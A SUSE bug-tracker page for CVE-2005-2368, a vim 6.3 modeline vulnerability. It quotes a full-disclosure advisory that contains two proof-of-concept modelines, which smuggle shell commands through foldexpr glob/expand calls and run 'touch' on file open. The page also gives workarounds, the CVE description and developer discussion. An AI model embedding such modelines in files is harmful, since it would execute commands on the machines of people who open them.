Bug 98300 - (CVE-2005-2368) VUL-0: CVE-2005-2368: vim modeline vuln again
(CVE-2005-2368)
VUL-0: CVE-2005-2368: vim modeline vuln again
Status: RESOLVED FIXED
Classification: Novell Products
Product: SUSE Security Incidents
Classification: Novell Products
Component: Incidents
unspecified
Other All
: P5 - None : Normal
: ---
Assigned To: Mads Martin Joergensen
Security Team bot
CVE-2005-2368: CVSS v2 Base Score: 10...
:
Depends on:
Blocks:
  Show dependency treegraph
 
Reported: 2005-07-25 16:09 UTC by Ludwig Nussel
Modified: 2021-10-19 13:46 UTC (History)
1 user (show)

See Also:
Found By: Other
Services Priority:
Business Priority:
Blocker: ---
Marketing QA Status: ---
IT Deployment: ---


Attachments

Note You need to log in before you can comment on or make changes to this bug.
Description Ludwig Nussel 2005-07-25 16:09:52 UTC
We received the following report via full-disclosure.
The issue is public.
We didn't fix modeline stuff in released distros in the past but it's increasingly making
me nervous. Couldn't vim just ask whether it should execute modlines?

Date: Mon, 25 Jul 2005 18:33:00 +0300
From: Georgi Guninski <guninski@guninski.com>
To: full-disclosure@lists.grok.org.uk
Subject: [Full-disclosure] Help poor children in Uganda

Georgi Guninski security advisory #75, 2005

Help poor children in Uganda

Systems affected:
vim 6.3

Date: 25 July 2005

Legal Notice:
This Advisory is Copyright (c) 2005 Georgi Guninski.
You  may  not  modify	it   and   distribute	it   or   distribute   parts
of it without the author's written permission - this especially  applies  to
so called "vulnerabilities databases"  and  securityfocus,  microsoft,	cert
and mitre.
If   you   want    to	 link	 to    this    content	  use	 the	URL:
http://www.guninski.com/where_do_you_want_billg_to_go_today_5.html
Anything in this document may change without notice.

Disclaimer:
The  information  in  this  advisory  is  believed   to   be   true   though
it may be false.
The opinions  expressed  in  this  advisory  and  program  are	my  own  and
not   of   any	 company.    The   usual   standard   disclaimer    applies,
especially the fact that Georgi Guninski  is  not  liable  for	any  damages
caused by direct  or  indirect	use  of  the  information  or  functionality
provided  by  this  advisory  or  program.    Georgi   Guninski   bears   no
responsibility for  content  or  misuse  of  this  advisory  or  program  or
any derivatives thereof.

Description:

open file in vim 6.3 < 6.3.082 with modelines on, got owned.

Details:

--1--
vim: foldmethod=expr:foldexpr=glob("`touch\ /tmp/where_do_you_want_bill_gates_to_go_today\?`"):
cannot be used in vulnerability databases.
-----

--2--
vim: foldmethod=expr:foldexpr=expand("$(touch$IFS/tmp/where_do_you_want_billg_to_go\?)"):
cannot be used in vulnerability databases.
-----

Workaround:

1. (preferred)
Disable modelines via
set modelines=0
and/or
set nomodeline
in .vimrc

or
2.
upgrade to 6.3.082 - patch available at:
ftp://ftp.vim.org/pub/vim/patches/6.3/

-- 
where do you want bill gates to go today?



























_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Comment 1 Ludwig Nussel 2005-07-27 07:26:06 UTC
Candidate: CAN-2005-2368 
URL: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-2368 
Reference: FULLDISC:20050725 Help poor children in Uganda 
Reference: 
URL:http://lists.grok.org.uk/pipermail/full-disclosure/2005-July/035402.html 
Reference: 
MISC:http://www.guninski.com/where_do_you_want_billg_to_go_today_5.html 
 
vim 6.3 before 6.3.082, with modelines enabled, allows attackers to 
execute arbitrary commands via shell metacharacters in the (1) glob or 
(2) expand commands of a foldexpr expression for calculating fold 
levels. 
Comment 2 Mads Martin Joergensen 2005-07-28 09:43:27 UTC
But we haven't have modelines enabled in ages?
Comment 3 Ludwig Nussel 2005-07-28 09:48:14 UTC
That's just to prevent everyone from beeing vulnerable by default. Yet they 
are useful so people who know that turn them on. 
Comment 4 Mads Martin Joergensen 2005-07-28 09:50:33 UTC
Well, sure, but that's not our problem is it?

Anyway--is it possible to turn on so vim asks to execute modelines?
Comment 5 Ludwig Nussel 2005-07-28 10:22:09 UTC
I don't know, that's what I was asking you. 
Comment 6 Mads Martin Joergensen 2005-08-05 13:57:32 UTC
BTW, this bug is fixed in STABLE since July 21st.
Comment 7 Thomas Biege 2009-10-13 21:35:10 UTC
CVE-2005-2368: CVSS v2 Base Score: 10.0 (AV:N/AC:L/Au:N/C:C/I:C/A:C)